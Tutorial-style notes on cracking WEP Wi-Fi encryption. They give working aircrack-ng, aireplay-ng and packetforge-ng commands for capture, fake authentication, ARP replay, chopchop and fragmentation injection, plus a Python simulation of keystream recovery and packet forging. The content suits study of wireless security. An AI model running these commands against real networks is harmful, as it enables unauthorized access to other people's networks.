#Crack WEP. WEP sends its IV in plaintext, so it is an insecure protocol. I spent a long time sniffing with an RTL8812AU and did not find a single WEP network, which shows that learning WEP cracking nowadays is a dragon-slaying art (a skill with nothing left to use it on).
I also did not switch my own router to WEP mode to try cracking it, so dragon-slaying it is.
WEP uses RC4: each packet is encrypted at the sender (AP or client) and decrypted at the receiver with a per-packet key stream.
WEP tries to ensure that each packet has a unique key stream by prepending a random 24-bit
initialization vector (IV) to the shared key before seeding RC4; this IV is sent in the packet as plain text.
24 bits is short: the IV space holds only about 16.7 million values, so on a busy network it repeats quickly and we can collect many packets that share the same IV, and therefore the same key stream.
aircrack-ng then feeds those IVs into statistical attacks (PTW and KoreK) to recover the key stream and
the WEP key.
Conclusion: the more IVs we collect, the more likely we are to crack the key.
#keep both programs (airodump-ng capturing and aircrack-ng) running at the same time and aircrack-ng will be able to determine the
#log all traffic from the target network
airodump-ng --channel [channel] --bssid [AP MAC] --write [file-name] [interface]
#--bssid expects the AP's MAC address (the BSSID column in airodump-ng); to filter by network name use --essid instead
airodump-ng --channel 2 --essid 18102He --write 18102He wlan1
#try to crack (airodump-ng appends -01 to the prefix, so the capture file is [file-name]-01.cap)
aircrack-ng 18102He-01.cap
#what if the AP is idle, or has no clients associated with it? Then it generates few or no data packets, and therefore few IVs.
We have to inject packets into the traffic in order to force the AP
to create new packets with new IVs.
Below are 3 methods to increase the number of IVs rapidly on clientless APs.
#before we can inject packets into the traffic, we have to authenticate our wifi card with the AP (fake authentication), because
APs ignore any requests that come from devices that are not associated with them.
This can be done easily using aireplay-ng (not airmon-ng) like so; the 0 after --fakeauth is the re-authentication delay in seconds, and 0 means authenticate only once:
aireplay-ng --fakeauth 0 -a [AP MAC] -h [your MAC] [interface]
aireplay-ng --fakeauth 0 -a E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 wlan1
#if this fake authentication was successful, the value under the "AUTH" column in
airodump-ng will change to "OPN"
#3 methods to do packet injection
1: ARP request replay. aireplay-ng waits for an ARP request from the network, then replays it to the AP over and over; the AP answers each one with a new packet, and thus a new IV.
aireplay-ng --arpreplay -b [AP MAC] -h [your MAC] [interface]
eg: aireplay-ng --arpreplay -b E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 wlan1
2: KoreK chopchop
We capture a packet (ideally an ARP packet, whose plaintext is largely predictable), recover its key stream byte by byte, and use that key stream to forge a new packet (with packetforge-ng);
then we inject the forged packet into the traffic to generate new IVs.
<1>: capture a packet and determine its key stream. This produces two files: a .cap file with the decrypted packet and a .xor file with the recovered key stream (PRGA).
aireplay-ng --chopchop -b [AP MAC] -h [your MAC] [interface]
eg:
aireplay-ng --chopchop -b E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 wlan1
<2>: forge a new packet. -0 builds an ARP packet, -k is the destination IP and -l the source IP (255.255.255.255 = broadcast), -y reads the key stream from the .xor file of the previous step, -w names the output file.
packetforge-ng -0 -a [AP MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [xor file from last step] -w [output]
eg:
packetforge-ng -0 -a E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w chop-out
<3>: inject the forged packet into the traffic to generate new IVs (-2 is interactive replay, -r reads the packet from the file; confirm with y when prompted)
aireplay-ng -2 -r [output from last step] [interface]
eg:
aireplay-ng -2 -r chop-out wlan1
3: Fragmentation attack
The goal of this method is to obtain 1500 bytes of PRGA (the output of RC4's pseudo-random generation algorithm, i.e. the key stream for one IV). With a key stream that long we can forge
a full-size packet, which is injected into the traffic to generate new IVs. The forge and inject steps are the same as for chopchop.
<1>: obtain the PRGA; this creates a .xor file.
aireplay-ng --fragment -b [AP MAC] -h [your MAC] [interface]
eg:
aireplay-ng --fragment -b E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 wlan1
<2>: forge a new packet (same options as above)
packetforge-ng -0 -a [AP MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [xor file from last step] -w [output]
eg:
packetforge-ng -0 -a E0:69:95:B8:BF:77 -h 00:C0:CA:6C:CA:12 -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w chop-out
<3>: inject the forged packet into the traffic to generate new IVs
aireplay-ng -2 -r [output from last step] [interface]
eg:
aireplay-ng -2 -r chop-out wlan1
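Why chopchop/fragmentation plus packetforge-ng work at all comes down to the WEP weaknesses described at the top of these notes: RC4 is seeded with IV||key, the 24-bit IV is sent in the clear, and the only integrity check is a CRC32 (the ICV). The simulation below is an added example written for this page, not code from aircrack-ng or packetforge-ng. It encrypts an ARP request the way WEP does, recovers that IV's key stream from ciphertext XOR known plaintext (what the .xor file holds), and then forges a broadcast ARP under the same IV without ever knowing the key, exactly what `packetforge-ng -0 -k 255.255.255.255 -l 255.255.255.255` produces. The WEP key, client MAC and IP addresses are made up; the AP and attacker MACs are the ones used in the commands above.

```python
"""WEP key-stream reuse and packet forging, simulated (added example, not aircrack-ng code)."""
import struct
import zlib

WEP_KEY = bytes.fromhex("0123456789")          # constructed 40-bit key; the attacker never learns it
AP_MAC = bytes.fromhex("e06995b8bf77")          # AP MAC from the aireplay-ng examples on this page
ATTACKER_MAC = bytes.fromhex("00c0ca6cca12")    # attacker MAC from the examples on this page
CLIENT_MAC = bytes.fromhex("001122334455")      # constructed legitimate client
IV_SPACE = 1 << 24                              # only ~16.7M IVs before the AP must reuse one


def rc4(key: bytes, length: int) -> bytes:
    """RC4 KSA + PRGA; returns `length` key-stream bytes for this key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV in the clear || RC4(IV||key) XOR (plaintext || ICV)."""
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4(iv + key, len(data)))


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: returns (plaintext, icv_ok). An AP drops frames whose ICV fails."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    pt = data[:-4]
    return pt, data[-4:] == icv(pt)


def build_arp(sender_mac: bytes, sender_ip: bytes, target_mac: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP header + ARP request (36 bytes), as carried in an 802.11 data frame.
    Everything except the addresses is fixed, which is why the tools above target ARP frames."""
    llc_snap = bytes.fromhex("aaaa030000000806")
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + sender_mac + sender_ip + target_mac + target_ip
    return llc_snap + arp


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Attacker side: key stream = ciphertext XOR known (plaintext || ICV).
    This is the content of the .xor file that chopchop/fragmentation produce."""
    known = known_plaintext + icv(known_plaintext)
    return xor(frame[3:3 + len(known)], known)


def forge_frame(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """Attacker side, packetforge-ng analogue: a valid frame under the same IV, no key needed."""
    data = new_plaintext + icv(new_plaintext)
    if len(data) > len(keystream):
        raise ValueError("key stream too short; fragmentation attack gives up to 1500 bytes")
    return iv + xor(data, keystream)


def demo() -> dict:
    iv = b"\x01\x02\x03"                         # constructed IV, visible to anyone sniffing
    # 1) A legitimate client sends an ARP request; the attacker sniffs the encrypted frame.
    client_arp = build_arp(CLIENT_MAC, bytes([192, 168, 1, 10]), b"\x00" * 6, bytes([192, 168, 1, 1]))
    frame = wep_encrypt(WEP_KEY, iv, client_arp)
    # 2) Same IV seen twice: XOR of the two bodies is the XOR of the plaintexts (key stream cancels).
    second = wep_encrypt(WEP_KEY, iv, build_arp(CLIENT_MAC, bytes([192, 168, 1, 10]), b"\x00" * 6, bytes([192, 168, 1, 2])))
    leak = xor(frame[3:], second[3:])
    # 3) Known plaintext (ARP) gives the key stream for this IV.
    ks = recover_keystream(frame, client_arp)
    # 4) Forge a broadcast ARP (-k/-l 255.255.255.255) under the same IV and let the AP verify it.
    forged_pt = build_arp(ATTACKER_MAC, b"\xff" * 4, b"\x00" * 6, b"\xff" * 4)
    pt, ok = wep_decrypt(WEP_KEY, forge_frame(iv, ks, forged_pt))
    return {
        "keystream_ok": ks == rc4(iv + WEP_KEY, len(ks)),
        "reuse_leaks_plaintext_xor": leak[:36] == xor(client_arp, second_plaintext := build_arp(
            CLIENT_MAC, bytes([192, 168, 1, 10]), b"\x00" * 6, bytes([192, 168, 1, 2]))) and len(second_plaintext) == 36,
        "forged_accepted": ok and pt == forged_pt,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Every step the AP performs here is what the real AP does; the only thing the attacker used was a sniffed frame and the fixed layout of ARP. Each accepted forged ARP makes the AP reply with a fresh IV, which is why the injection loop above fills airodump-ng's IV counter so quickly.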